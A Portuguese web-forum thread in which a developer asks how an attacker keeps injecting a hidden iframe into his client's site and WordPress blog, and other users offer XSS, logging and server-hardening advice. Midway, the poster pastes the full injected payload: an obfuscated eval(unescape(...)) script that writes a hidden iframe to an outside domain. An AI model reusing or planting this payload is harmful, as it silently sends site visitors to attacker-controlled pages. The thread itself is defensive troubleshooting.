Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
ola gente
uma semente do mal (hacker) fez um insert de um java script doido no rodape do seu do site do meu cliente
sendo que o result iframe no rodape do site
que redireciona para o site dele
eu removo o bicho mais o monstro inseriu novamente
sendo que o suporte tecnico do meu provedor so tem burro que nao ajudar em nada
ele so consegue colocar na index do site e na index do admin
sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim
www.site.com/pagina/reserva/admin
minha suspeita que ele esta usando um scan pq ele inseriu agora a tarde no admin2 que era admin
eu me lembro de um code que bloqueava scan no server online um htacess para ser sincero
como e iframe eu coloquei um jquery
$(iframe).remove();
e nao apareceu mais
a minha duvida e como esse cara consegui inserir isso ?
e como eu posso me protege desse tipo de ataque ?
Desculpe gente eu nao posso colocar o nome do site aqui :(
a tecnica dele usada e java script injection
sendo que e politica da empresa nao atacar
pq se eu pego ele dentro do admin qualquer coisa que entra dentro do admin e um ip
eu teria como zoar ele
como politica de segurança usei um htacess agora para ninguem acessar mais o admin nesse horario da noite
mais e o site como eu resolvo isso
to sem ideia :(
ola meu velho
quando eu coloque hacker foi meio generico
acho impossivel ele te tido acesso ao ftp
sobre essa parte aqui
sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim
www.site.com/pagina/reserva/admin
significar
www.sitedomeucliente.com/paginasecreta/maisoutrapaginaoculta/admin
ou seja somente um scan de pastas dentro do server seria possivel
eu pedi ao suporte tecnico um log o pessoal e muito burro disse que nao tem
agora como esse cara fez isso que me deixa doido
como você falou o code pode esta sendo pelo formulario que permite html
mais como ele fez isso e como me protege disso ?
essa e a questão
um abraço
>
acho impossivel ele te tido acesso ao ftp
por que acha isso?
>
www.sitedomeucliente.com/paginasecreta/maisoutrapaginaoculta/admin
ou seja somente um scan de pastas dentro do server seria possivel
O Google é o maior aliado para encontrar páginas "ocultas". É por ele que se encontram com facilidades aqules famosos db_config.inc.
Estando no public_html, é muito difícil esconder uma página. Um robots.txt pode ajudar, mas não tenho certeza até onde ele é eficaz.
>
eu pedi ao suporte tecnico um log o pessoal e muito burro disse que nao tem
Sinceramente, mude para um, servidor decente, que pelo menos tenha logs de acesso a FTP
>
como você falou o code pode esta sendo pelo formulario que permite html
mais como ele fez isso e como me protege disso ?
a função strip_tags() retira todas as tags HTML.Mas é possível criar uma função, usando preg_replace(), para retirar algumas tags e permitir outras.
É isso que o amigo falou, usa a função strip_tags() que irá resolver os problemas do cara te invadir ou fazer algum mal atraves de XSS[[o que é XSS? ]](http://pt.wikipedia.org/wiki/Cross-site_scripting)provavelmente você sofreu um ataque desses. O correto seria você deixa o site em off alguns minutinhos e escapar tudo que entra no seu site ou seja tratar todos os dados que podem ser inseridos pelos usuários para que este tipo de coisa não aconteça.No mais procura como evitar XSS e SQL Injection. Que acho que seu problema irá ser sanado até mais!
Abraço. ^_^
>
>
como você falou o code pode esta sendo pelo formulario que permite html
mais como ele fez isso e como me protege disso ?
a função strip_tags() retira todas as tags HTML.Mas é possível criar uma função, usando preg_replace(), para retirar algumas tags e permitir outras.
para este fim, passe as tags permitidas como segundo parâmetro de strip_tags
o que esse cara colocar e isso no meu site
<?php
// Silence is golden.
?><script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->
agora de manha
ele colocou na index do blog
que usar wordpress
esse code maluco gerar um iframe que vai para o site
e o blog esta em wordpress
e ele so colocar em paginas index
ontem eu coloque um jquery que remove qualquer iframe
resultado final so na index do blog que eu nao coloquei e o cara jogou
o blog e wordpress
sobre a pergunta do ftp :(
para eu colocar qualquer no site
eu tenho que pegar os arquivos gravar em cd
e entrega para um cara da empresa
que faz o upload numa maquina linux que tem mais segurança do que qualquer coisa no mundo
e o cara que mexer nessa maquina ele passar o dia todo sentando na frente desse pc
e so ele tem essa conta e uma unica e desculpe a sinceridade o cara trabalhar linux a muito anos
sobre o wordpress ele esta todo atualizado ,e o tema e proprio da empresa
eu nao entendi como ele esta entrando e como me proteger disso
Rapaz procure ler sobre segurança, desta forma você não resolverá seu problema, os companheiros postaram as funçoes e você ainda bate na mesma tecla.
Antes de sair culpando e chamandos as pessoas de burras, certifique-se primeiro se o erro não é seu, como já vi em diversos tópicos parecidos, no final a culpa é do próprio sublinho onde usam programas crackeados e contaminam as proprias máquianas de acesso ao host e acham que são espertos por bular programas com crackes recheados.
>
Rapaz procure ler sobre segurança, desta forma você não resolverá seu problema, os companheiros postaram as funçoes e você ainda bate na mesma tecla.
Antes de sair culpando e chamandos as pessoas de burras, certifique-se primeiro se o erro não é seu, como já vi em diversos tópicos parecidos, no final a culpa é do próprio sublinho onde usam programas crackeados e contaminam as proprias máquianas de acesso ao host e acham que são espertos por bular programas com crackes recheados.
@WDuarte eu nao entendi a sua colocação
sobre os formularios eu nao respondi pq eu esqueci de comentar sobre o assunto
o site e para apresentacao
e o unico form que tem do lado de fora e um sistema de pergunta interno nosso
mysql escape string ( que para entrar no banco eu uso isso)
Desculpe a sinceridade eu nao entendi a parte de chamar alguem de burro ,eu nao tenho culpa ser o suporte tecnico do provedor nao ajudar em nada
e nao liberar log para mim.
Ser você meus post eu sou um camarada que ajudar legal,sendo que agora eu estou com um problema
e as sugestao postadas eo minimo que ser faz para uma segurança de site
eu avalie as possibilidades de como ele poderia ter feito
nada entra no banco aqui sem escape
Antigamente teve uma postagem sobre SQL injection uns 3 anos neguinho criou funcao com mais de 1000 linhas
eu pesquisei na web e vi com uma linha resolviar o problema
eu nao estou procurando um culpado e sim uma manera de protege o site
pq ele nao tem entrada por formulario
os formularios sempre levam escape antes de bate no banco
Get eu verifico se e um numero antes de abrir e ganhar escape tambem
mais tudo bem eu vou pesquisar na web como me proteger
um abraço a todos que postaram
>
sobre a pergunta do ftp :(
para eu colocar qualquer no site
eu tenho que pegar os arquivos gravar em cd
e entrega para um cara da empresa
que faz o upload numa maquina linux que tem mais segurança do que qualquer coisa no mundo
e o cara que mexer nessa maquina ele passar o dia todo sentando na frente desse pc
e so ele tem essa conta e uma unica e desculpe a sinceridade o cara trabalhar linux a muito anos
Pelo que entendi, essa máquina não é o servidor. É apenas um terminal que acessa o servidor via FTPIsso não significa segurança
Acesso SSH é uma das coisas mais seguras que existem (mais que FTP comum, apesar de existir o SFTP, FTP com SSH).
Fica sentado na frente de um terminal o dia todo não quer dizer nada. O problema está no servidor remoto
E me parece contraditório o cara ser um expert em Linux, querer um sistema seguro de forma a nem liberar conta FTP e, mesmo assim, não ter um sistema de logs de aceesso
Verifique o dono dos arquivos, as permissões deles principalmente (vai precisar entender um pouco de Linux e chmod).
O invasor pode ter conseguido acessar uma outra conta qualquer no servidor, mas encontrou seu s arquivos com permissão de escrita. Se ele tiver acesso shell no servidor, pode fazer qualquer coisa com sues arquivos.
Ola bom dia @WDuarte
Obrigado pela sugestão ,por medida de segurança eu ja mudei de server,conforme o @Beraldo falou
mais com certeza eu to louco para descobrir como ele fez ,ate agora eu to dormindo em paz
mais estou revisando os scripts e otimizado tudo
to montando um log em php que vai me ajudar a ver os movimentos dos caras e entende a tecnica e me protege e claro
@Beraldo
Calma meu moderador você parece meio estressado ;)
mais mesmo assim obrigado pela sugestão como eu tinha postando anteriormente eu nao estou procurando um culpado
e sim uma soluçao e como eu postei la em cima com esse log eu vou aprende as tecnicas usadas por ele e me protege disso
e claro que segurança a prova isso e meio utopia mais tambem eu nao posso dar mole com esses carinhas,estamos verificando tudo e possivel erros
e as sugestão que você postou ,mais to com o meu orgulho ferido :( pela invasao ,pq nao sei quem errou no trabalho
Afinal Ainda sou o kakaroto :P
um abraço as todos que postaram
qualquer sugestão nova vai ajudar nao sou a mim , a outro que passarem pelo mesmo problema que eu :)
>
@Beraldo
Calma meu moderador você parece meio estressado ;)
Não.Justamente o contrário. Sou bem tranquilo. :)
É que isso não fica muito transparente por meio de texto. ;)
E eu não citei culpados. Eu apenas achei contraditórias algumas coisas que você postou sobre o servidor. Às vezes essa sensação de segurança é falsa.
Eu também uso Linux há bastante tempo e sei que há coisas muito seguras e outras pouco seguras.
E todos sabem que, não importa o SO, nunca há 100% de segurança
Muda de hospedagem,
qualquer hospedagem que se prese tem um log de acesso.
nao adianta tambem ser um servidor linux, se as politicas de segurança sao ruins.
Faz mum teste.
pegue o ip do seu site e de um nmap nele e descubra que portas realmente estao abertas.
abraço
@Beraldo tranquilo meu velho :) eu to montando um script para gerar uns log interno
revisando o site ou seja me protegendo para ser sincero nunca passei por isso
@koga021 vou :) ver esse server novo com nmap ser esta ok
isso eu nao fiz
excelente sugestao meu velho
por enquanto eu estrou tranquilo ;)
mais tenho que preparar a minha defesa para o proximo ataque
>
eu to montando um script para gerar uns log interno
Esse log é de acesso ao seu site, certo?O servidor deve possuir sistema de log de acesso HTTP e FTP.
Manualmente vocÊ vai conseguir gerar logs ligados ao seu site. Mas não conseguirá registro de acesso FTP, por exemplo, ou SSH, caso seu servidor permita esse tipo de acesso
@ola beraldo
olha esse post beraldo e a mesma coisa do meu sendo que o site do cara la e em asp
isso coisa confirmar a minha suspeita e algo robotico
Minha ideia e usar por eliminação , ser for um cara logado no site eu tenho ele gravado no banco se ele fizer algum movimento estranho no server
ser usarem uma senha louca para logar no site eu tenho como gravar tudo e ver que tipo de acao esse povo ta fazendo
user injection via url ou sql e por ai vai
eu preciso entende como eles estao fazendo e assim tomar um pouco de aspirina
mais com certeza eu tenho log de acesso ao servidor
nao e que todo mundo falar um dia da caça e outro do caçador ^_^
Ola @beraldo ablas espanhol
eu disse que hj iar fazer a caça
olha essa postagem
http://powers.cl/viewtopic.php?f=4&p=3642330
tu vai reparar no final esse code la
<!-- uy7gdr5kmn -->
e uma variante do meu
olha essa postagem e veja a solução
olha os comentarios
traduzindo nao foi o programador em php aqui que fez a bosta nao como tava rolando aqui
lembrar do cara que upar os sites para web
acho que vamos precisar de um novo responsavel para dar manutençao dos pc : :P
ainda so o kakaroto :P
>
uma semente do mal (hacker)
Diferença entre Hacker e CrackerIsso foi feito por um cracker
>
sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim
www.site.com/pagina/reserva/admin
Não é disponível para WEB? Você acabou de postar uma URL. Não entendi.
>
a minha duvida e como esse cara consegui inserir isso ?
e como eu posso me protege desse tipo de ataque ?
O código pode ter sido inserido por meio de um formulário que está permitindo inserção de HTMLTem que analisar logs de acesso também. É possível que o cara tenha conseguido acessar o FTP, pode ter conseguido acesso root ao servidor (ou somente à sua conta)